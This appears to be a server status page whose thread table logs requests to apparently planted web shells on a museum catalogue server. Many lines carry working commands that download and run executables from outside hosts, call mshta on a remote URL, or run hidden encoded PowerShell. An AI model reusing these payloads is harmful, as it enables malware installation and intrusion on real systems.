Free memory: 132.34 MB Total memory: 210.37 MB Max memory: 493.06 MB
Max threads: 40 Current thread count: 0 Current thread busy: 0
Max processing time: 0 ms Processing time: 0.0 s Request count: 0 Error count: 0 Bytes received: 0.00 MB Bytes sent: 0.00 MB
| Stage | Time | B Sent | B Recv | Client | VHost | Request |
|---|
P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive
Max threads: 250 Current thread count: 149 Current thread busy: 50
Max processing time: 4723607767 ms Processing time: 1.94658784E8 s Request count: 484079 Error count: 23834 Bytes received: 44.27 MB Bytes sent: 6838.56 MB
| Stage | Time | B Sent | B Recv | Client | VHost | Request |
|---|---|---|---|---|---|---|
| S | 156171847 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F202.56.166.78%3A8888%2Fgaji%2Fjs%2Fwindllhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwindllhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwindllhost.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 249372433 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostx.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostx.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 5012915396 ms | 0 KB | 0 KB | 106.114.79.242 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 2454439446 ms | 0 KB | 0 KB | 221.192.179.92 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| S | 4028131355 ms | 0 KB | 0 KB | 154.160.17.55 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 1177900869 ms | 0 KB | 0 KB | 154.160.16.122 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 4545484293 ms | 0 KB | 0 KB | 221.192.181.29 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 4024939735 ms | 0 KB | 0 KB | 154.160.17.55 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 4352264911 ms | 0 KB | 0 KB | 221.192.179.200 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 4029053230 ms | 0 KB | 0 KB | 154.160.17.55 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 4028986582 ms | 0 KB | 0 KB | 154.160.17.55 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 3802697686 ms | 0 KB | 0 KB | 60.1.206.84 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 4028848372 ms | 0 KB | 0 KB | 154.160.17.55 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 3801734915 ms | 0 KB | 0 KB | 60.1.206.84 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 3076443899 ms | 0 KB | 0 KB | 221.192.178.88 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 3588717896 ms | 0 KB | 0 KB | 221.192.179.41 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| S | 1178522420 ms | 0 KB | 0 KB | 154.160.16.122 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 1178036738 ms | 0 KB | 0 KB | 154.160.16.122 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 155521456 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1 |
| S | 3075480973 ms | 0 KB | 0 KB | 221.192.178.88 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| S | 238175042 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostdll.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostdll.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 238546125 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhostp.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhostp.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1372573613 ms | 0 KB | 0 KB | 102.176.65.39 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 3340840938 ms | 0 KB | 0 KB | 102.176.65.154 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| K | 17152 ms | ? | ? | 114.119.138.147 | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1178594721 ms | 0 KB | 0 KB | 154.160.16.122 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| S | 1208056612 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| S | 1208088029 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1208012684 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| S | 3245441255 ms | 0 KB | 0 KB | 221.192.180.174 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 252473373 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows+md+C%3A%5CProgramData%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CProgramData%5CWindows%5Cwinhost.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CProgramData%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CProgramData%5CWindows%5Cwinhost.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1208076940 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| S | 3244478385 ms | 0 KB | 0 KB | 221.192.180.174 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1178060917 ms | 0 KB | 0 KB | 154.160.16.122 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1208031777 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| S | 159658866 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F83.133.184.251%2Fadmin%2Fjs%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1 |
| S | 1208025760 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| S | 1208019340 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| S | 779326959 ms | 0 KB | 0 KB | 102.176.65.144 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1372638959 ms | 0 KB | 0 KB | 102.176.65.39 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 154965029 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1 |
| S | 2453476484 ms | 0 KB | 0 KB | 221.192.179.92 | 81.45.140.46 | GET /mark/typo.jsp?s=e&e=1&action=exec&i=powershell.exe%20-NonI%20-W%20Hidden%20-NoP%20-Exec%20Bypass%20-Enc%20dABhAHMAawBsAGkAcwB0AA==&pwd=asicanv8aw&l=-1 HTTP/1.1 |
| S | 779623062 ms | 0 KB | 0 KB | 102.176.65.144 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 1208065248 ms | 0 KB | 0 KB | 102.176.65.110 | catalogo.museolazarogaldiano.es | GET /jexws4/jexws4.jsp?ppp=mshta+http%3A%2F%2Fweb.starthrek.pagekite.me%2FPwwwn HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 159284265 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows%5Cwinhost2.exe+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F83.133.184.251%2Fadmin%2Fjs%2Fwinhost2.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost2.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost2.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 605237325 ms | 0 KB | 0 KB | 206.253.167.213 | 81.45.140.46 | GET /jexws4/jexws4.jsp?ppp=%22C%3A%5CProgram+Files%5CInternet+Explorer%5Ciexplore.exe%22+http%3A%2F%2Ftakkasihinfo.online%2F HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 391983706 ms | 0 KB | 0 KB | 102.176.65.220 | catalogo.museolazarogaldiano.es | POST /jexws4/jexws4.jsp HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| K | 465 ms | ? | ? | 114.119.138.239 | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 136319806 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F45.133.9.202%2Fgodlikelobby%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhostx.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhostx.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 156885095 ms | 0 KB | 0 KB | 45.133.9.202 | 81.45.140.46 | GET /jexinv4/jexinv4.jsp?ppp=cmd.exe+%2Fc+if+not+exist+C%3A%5CTemp%5CWindows+md+C%3A%5CTemp%5CWindows+%26%26+cmd.exe+%2Fc+if+exist+C%3A%5CTemp%5CWindows%5Cwinhost.exe+del+%2Ff+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+powershell.exe+-c+Invoke-WebRequest+http%3A%2F%2F202.56.166.78%3A8888%2Fgaji%2Fjs%2Fwinhost.exe+-O+C%3A%5CTemp%5CWindows%5Cwinhost.exe+%26%26+cmd.exe+%2Fc+C%3A%5CTemp%5CWindows%5Cwinhost.exe HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
| S | 484 ms | 24 KB | 0 KB | 3.210.184.142 | catalogo.museolazarogaldiano.es | GET /status HTTP/1.1 |
| R | ? | ? | ? | ? | ? | ? |
| R | ? | ? | ? | ? | ? | ? |
P: Parse and prepare request S: Service F: Finishing R: Ready K: Keepalive